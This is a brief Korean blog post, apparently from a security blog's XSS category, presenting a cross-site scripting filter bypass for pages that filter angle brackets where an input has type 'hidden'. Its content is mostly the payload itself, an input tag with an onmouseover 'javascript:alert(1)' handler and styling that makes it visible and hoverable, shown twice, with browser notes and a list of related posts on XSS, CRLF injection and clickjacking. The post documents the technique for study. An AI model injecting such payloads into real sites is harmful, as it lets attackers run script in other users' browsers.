type에 hidden 속성을 갖고 있으며 <, > 태그를 필터링하고 있을 경우.
<input type="hidden" onmouseover="javascript:alert(1)" style="display:block; width:500px; height:500px;" />
IE6, 7, 8 혹은 FireFox
Good Luck~ :-)
<input type="hidden" onmouseover="javascript:alert(1)" style="display:block; width:500px; height:500px;" />
IE6, 7, 8 혹은 FireFox
Good Luck~ :-)
'위험한_친구들 > 십자군_XSS' 카테고리의 다른 글
Cross-Site Scripting vulnerability with JavaScript and JQuery (0) | 2011.10.18 |
---|---|
XSS: Cross-site Scripting (0) | 2011.10.11 |
CRLF Injection (0) | 2011.09.28 |
Clickjacking for Shells (0) | 2011.09.22 |
XSS in Skype for iOS (0) | 2011.09.21 |